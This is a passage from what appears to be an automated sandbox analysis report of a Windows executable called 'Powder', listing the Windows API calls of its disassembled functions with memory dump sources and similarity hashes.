                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E8DDBB
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E8DDDC
                                                  • ShowWindow.USER32(00000003,00000000), ref: 00E8DDFB
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00E8DE20
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E8DE43
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                  • String ID:
                                                  • API String ID: 1211466189-0
                                                  • Opcode ID: 3e94e242cf0b6c9706bbd36ff17d12f31f32bcc0da1f774d0da7cc205d426fc5
                                                  • Instruction ID: 8474d9b8454869baf400a74d43d0511a0db073f4154270ee8dc54586cdfa5495
                                                  • Opcode Fuzzy Hash: 3e94e242cf0b6c9706bbd36ff17d12f31f32bcc0da1f774d0da7cc205d426fc5
                                                  • Instruction Fuzzy Hash: 2EB19931A04229EFCF14DF69C985BAD7BB1FF04705F08916AEC4CAE295D731A950CB90
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E8147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E8040D,?,?), ref: 00E81491
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E8044E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3479070676-0
                                                  • Opcode ID: ad8ff2e754f54eca80e7feb9df2080f386be058f0d74731e4c2e9f52c3750c2a
                                                  • Instruction ID: d0d832e661cd429b592a76e10a8af03f8feadd59e2bb86cb3c30e0607aad5084
                                                  • Opcode Fuzzy Hash: ad8ff2e754f54eca80e7feb9df2080f386be058f0d74731e4c2e9f52c3750c2a
                                                  • Instruction Fuzzy Hash: F3A18B70204201DFCB10EF64C881F6EB7E5AF84314F14991DF99AA72A2DB31E959DF42
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C508,00000004,00000000,00000000,00000000), ref: 00E02E9F
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E3C508,00000004,00000000,00000000,00000000,000000FF), ref: 00E02EE7
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E3C508,00000004,00000000,00000000,00000000), ref: 00E3C55B
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C508,00000004,00000000,00000000,00000000), ref: 00E3C5C7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: faba2907421a1193d23f837e0a93500343dbd7bf4b18b7facea2704ed96996e3
                                                  • Instruction ID: 818252a49f5f26c6c76c2a4d48232b39e539e34e8cf5f4983d20d05c7a5bcf20
                                                  • Opcode Fuzzy Hash: faba2907421a1193d23f837e0a93500343dbd7bf4b18b7facea2704ed96996e3
                                                  • Instruction Fuzzy Hash: 4F41E731644680AEC7379729C88CAAB7BD2AB81318F64740FE647729E1C772E8C6D710
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E67698
                                                    • Part of subcall function 00E20FE6: std::exception::exception.LIBCMT ref: 00E2101C
                                                    • Part of subcall function 00E20FE6: __CxxThrowException@8.LIBCMT ref: 00E21031
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E676CF
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00E676EB
                                                  • _memmove.LIBCMT ref: 00E67739
                                                  • _memmove.LIBCMT ref: 00E67756
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00E67765
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E6777A
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E67799
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: 52cfbeb9a1b9c45274a8d581725baa7d8fe3afc76d2e130a4aae9b463ccce0f7
                                                  • Instruction ID: f584afd3bbb6847bf4ac7c33b0569782b2678459964e5d900036eb28cb5187a4
                                                  • Opcode Fuzzy Hash: 52cfbeb9a1b9c45274a8d581725baa7d8fe3afc76d2e130a4aae9b463ccce0f7
                                                  • Instruction Fuzzy Hash: 9B318131904215EFDB10EF65EC85E6FB7B8EF45354B2440A6F904BB256D7309E54CBA0
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00E86810
                                                  • GetDC.USER32(00000000), ref: 00E86818
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E86823
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00E8682F
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E8686B
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E8687C
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E8964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00E868B6
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E868D6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: 8b392923cb07fecb462fd9a1216fd5690bb4a593ff8c5031d1c8e950c603ba9d
                                                  • Instruction ID: 7263491327d7fac8897a2bc3775d377fdb7f322653baff473a5c808620a3bb0a
                                                  • Opcode Fuzzy Hash: 8b392923cb07fecb462fd9a1216fd5690bb4a593ff8c5031d1c8e950c603ba9d
                                                  • Instruction Fuzzy Hash: 0E318B72101210BFEB159F15CC8AFEA3BA9EF49765F040062FE0CAA292C7759C51CBB0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 9eb654d84b1028e981a676c1e504822c92457d9b097727883bf918c60023ae13
                                                  • Instruction ID: f3c0014f626842d8a345d0a8de4f0954ab636ea8a4ba69429a635297398d5af9
                                                  • Opcode Fuzzy Hash: 9eb654d84b1028e981a676c1e504822c92457d9b097727883bf918c60023ae13
                                                  • Instruction Fuzzy Hash: C52107766007157EDA0475309D62FAF77AC9E3874AF283421FD02B6A42F710EF19C6A1
                                                  APIs
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                    • Part of subcall function 00E1436A: _wcscpy.LIBCMT ref: 00E1438D
                                                  • _wcstok.LIBCMT ref: 00E6F2D7
                                                  • _wcscpy.LIBCMT ref: 00E6F366
                                                  • _memset.LIBCMT ref: 00E6F399
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: 7496449c67837a7d7dccece17b832751c71212fcd02b471239f417cb44043cf3
                                                  • Instruction ID: 76d07d452043470d7aedecbc4650e71dff1070644aad030202f1498181436b65
                                                  • Opcode Fuzzy Hash: 7496449c67837a7d7dccece17b832751c71212fcd02b471239f417cb44043cf3
                                                  • Instruction Fuzzy Hash: 71C19D716043419FC714EF24E891A9FB7E4BF84394F00696DF999A72A2DB30ED45CB82
                                                  APIs
                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E772EB
                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E7730C
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E7731F
                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00E773D5
                                                  • inet_ntoa.WSOCK32(?), ref: 00E77392
                                                    • Part of subcall function 00E5B4EA: _strlen.LIBCMT ref: 00E5B4F4
                                                    • Part of subcall function 00E5B4EA: _memmove.LIBCMT ref: 00E5B516
                                                  • _strlen.LIBCMT ref: 00E7742F
                                                  • _memmove.LIBCMT ref: 00E77498
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                  • String ID:
                                                  • API String ID: 3619996494-0
                                                  • Opcode ID: 155aa4b0be5d671e2e7718c040501f895ad3c52aae369be6816b1c03f982942a
                                                  • Instruction ID: 8d97dc4ffd2e8ef900d8fbc89d2d6284d8f4c892a6457907d8160e25cce678a2
                                                  • Opcode Fuzzy Hash: 155aa4b0be5d671e2e7718c040501f895ad3c52aae369be6816b1c03f982942a
                                                  • Instruction Fuzzy Hash: 9C81A4B1208200AFD310EB24DC85E6BB7E8AF94714F14A919F595BB2E2EA70DD45CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bd0e1a7fa98d73e7b7349cf51ea8e682376de742e35faad8a30279bc19aa356
                                                  • Instruction ID: 6275387f74fd856330b839ba1607e338c91a0332aef69c7a666fb1098d0ed6b4
                                                  • Opcode Fuzzy Hash: 6bd0e1a7fa98d73e7b7349cf51ea8e682376de742e35faad8a30279bc19aa356
                                                  • Instruction Fuzzy Hash: 9E715E70900509EFDB09CF59CC49AFEBBB9FF86314F148199F915BA291C7309A91CB60
                                                  APIs
                                                  • IsWindow.USER32(017A5348), ref: 00E8BA5D
                                                  • IsWindowEnabled.USER32(017A5348), ref: 00E8BA69
                                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00E8BB4D
                                                  • SendMessageW.USER32(017A5348,000000B0,?,?), ref: 00E8BB84
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00E8BBC1
                                                  • GetWindowLongW.USER32(017A5348,000000EC), ref: 00E8BBE3
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E8BBFB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 719cd659b3a6e341f48b5200c201affd456fbfe416a53cb4e1a7523839b4e995
                                                  • Instruction ID: ab285536aa1a553aeda381a0442dc88535dead6fc4b5420137cdf6cf7e722fb1
                                                  • Opcode Fuzzy Hash: 719cd659b3a6e341f48b5200c201affd456fbfe416a53cb4e1a7523839b4e995
                                                  • Instruction Fuzzy Hash: 2871C034604204AFDB29EF54C894FFABBB5EF49304F14509AE99DB7261C732AC51DB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E7FB31
                                                  • _memset.LIBCMT ref: 00E7FBFA
                                                  • ShellExecuteExW.SHELL32(?), ref: 00E7FC3F
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                    • Part of subcall function 00E1436A: _wcscpy.LIBCMT ref: 00E1438D
                                                  • GetProcessId.KERNEL32(00000000), ref: 00E7FCB6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00E7FCE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: 17b0f7d19e3717ad34cf0bd225dde12de037e41eb4e31d577828d18ab89d3461
                                                  • Instruction ID: e839aaf6e2ad2a9d035be2290b4b1ed7d31311cba4e005b44ff81772c41f3d69
                                                  • Opcode Fuzzy Hash: 17b0f7d19e3717ad34cf0bd225dde12de037e41eb4e31d577828d18ab89d3461
                                                  • Instruction Fuzzy Hash: 4C61BCB1A00619DFCB15EFA4C5909AEF7F4FF08310B149569E85ABB391CB30AD81CB94
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00E6178B
                                                  • GetKeyboardState.USER32(?), ref: 00E617A0
                                                  • SetKeyboardState.USER32(?), ref: 00E61801
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E6182F
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E6184E
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E61894
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E618B7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 6bece2801accdd35c9314d727a0a7494560afb4cbbb240449e790f3c2ecbaf48
                                                  • Instruction ID: e9a52898f1a20d31d0fdc64b2c8f2128743debf0c56926c8ca26986ba14de0c4
                                                  • Opcode Fuzzy Hash: 6bece2801accdd35c9314d727a0a7494560afb4cbbb240449e790f3c2ecbaf48
                                                  • Instruction Fuzzy Hash: D851E6609887D53EFB374238DC55BBA7EE95B06388F0C95CAE1D5668C3C294ACC4D750
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00E615A4
                                                  • GetKeyboardState.USER32(?), ref: 00E615B9
                                                  • SetKeyboardState.USER32(?), ref: 00E6161A
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E61646
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E61663
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E616A7
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E616C8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 4d0b49ab4ea7d9f3fc8fcebffb61315fa0668c39587e804ea7eb0a5654823bf9
                                                  • Instruction ID: 23e8530b4189a8388db772bd1ef838d1ff2a0337a7915b73fb9034e05b265259
                                                  • Opcode Fuzzy Hash: 4d0b49ab4ea7d9f3fc8fcebffb61315fa0668c39587e804ea7eb0a5654823bf9
                                                  • Instruction Fuzzy Hash: F25126A05887D13DFB338724DC05BBABEE95B06388F0C94CAE0D5668C3C694EC98E751
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: 6ec6c5c2dacc796841c72d44dc0eeaa06a04f0e77f84a23fd440889ef83166ab
                                                  • Instruction ID: f7f267185f70b25d01fce51632cf7f1eb5cd6bf20d5c968dca219f1ebdff3aaf
                                                  • Opcode Fuzzy Hash: 6ec6c5c2dacc796841c72d44dc0eeaa06a04f0e77f84a23fd440889ef83166ab
                                                  • Instruction Fuzzy Hash: A641CEA6C60628B5CB11FBB4DC4A9CFB3F9AF04310F11A856EA09F3161E634A315C7A5
                                                  APIs
                                                    • Part of subcall function 00E64BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E63B8A,?), ref: 00E64BE0
                                                    • Part of subcall function 00E64BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E63B8A,?), ref: 00E64BF9
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00E63BAA
                                                  • _wcscmp.LIBCMT ref: 00E63BC6
                                                  • MoveFileW.KERNEL32(?,?), ref: 00E63BDE
                                                  • _wcscat.LIBCMT ref: 00E63C26
                                                  • SHFileOperationW.SHELL32(?), ref: 00E63C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: 2f034437d52848897976e73c18f86699e42c50b140f3517832ba9122dd999355
                                                  • Instruction ID: 777d2aa310236ec14bc97584661acaf7afd1e32be569f153a78b30f8fda79902
                                                  • Opcode Fuzzy Hash: 2f034437d52848897976e73c18f86699e42c50b140f3517832ba9122dd999355
                                                  • Instruction Fuzzy Hash: A3418F7154C344AEC752EF74E485ADBB7E8AF88380F40296EF499E3191EB34D688C752
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E878CF
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87976
                                                  • IsMenu.USER32(?), ref: 00E8798E
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E879D6
                                                  • DrawMenuBar.USER32 ref: 00E879E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
